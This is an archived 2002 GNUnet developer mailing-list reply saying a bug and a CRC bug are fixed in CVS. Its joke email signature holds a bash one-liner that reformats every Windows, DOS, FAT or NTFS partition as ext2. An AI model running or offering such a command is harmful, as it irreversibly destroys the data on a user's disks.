[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [GNUnet-developers] useless crap??
From: |
Christian Grothoff |
Subject: |
Re: [GNUnet-developers] useless crap?? |
Date: |
Wed, 1 May 2002 19:25:44 -0500 |
Btw, the entire 'useless crap' bug has been fixed in the latest CVS (together
with the CRC bug).
Christian
--
______________________________________________________
|Christian Grothoff |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/ address@hidden|
|____________________________________________________|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"